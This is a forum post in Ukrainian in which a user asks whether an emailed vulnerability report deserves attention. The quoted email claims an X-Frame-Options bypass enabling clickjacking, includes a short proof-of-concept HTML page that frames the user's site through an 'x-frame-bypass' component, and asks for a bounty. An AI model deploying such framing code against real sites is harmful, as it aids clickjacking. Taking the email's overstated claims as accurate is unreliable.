![Neron](/data/avatars/m/0/20.jpg?1397300189)
Neron
Пользователи
- Реєстрація
- 12.04.2014
- Повідомлення
- 384
- Репутація
- 24
- Вік
- 33
Сьогодні отримав лист на пошту:
Скажіть будь ласка: що це таке і чи варто звертати на це увагу?Hi there,
Team I have found a vulnerability in your site.
bypass X-Frame-Options ( Proxy protection NOT used )
Proxy protection NOT used , i can bypass X-Frame-Options header and recreate clickjacking on the whole domain.
I see that you don't have a reverse proxy protection that allows attackers to proxy your website rather than iframe it.
POC :
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="X-Frame-Bypass: Web Component extending IFrame to bypass X-Frame-Options: deny/sameorigin">
<title>X-Frame-Bypass Web Component Demo</title>
<style>
html, body {
margin: 0;
padding: 0;
height: 100%;
overflow: hidden;
}
iframe {
display: block;
width: calc(100% - 40px);
height: calc(100% - 40px);
margin: 20px;
}
img {
position: absolute;
top: 0;
right: 0;
}
</style>
<script src="https://unpkg.com/@ungap/custom-elements-builtin"></script>
<script src="x-frame-bypass.js" type="module"></script>
</head>
<body>
<h1> X-FRAME PROTECTION BYPASSED </h1>
<iframe is="x-frame-bypass" src="https://mysite.com/"></iframe>
</body>
</html>
FIX:
Content-Security-Policy: frame-ancestors 'self' is better, because it checks all frame ancestors
You should implement CSP header to avoid these sort of attacks
Please let me know if you want more information.
Hope that you appreciate my ethical disclosure of this vulnerability, hoping for the bounty.
Thank you!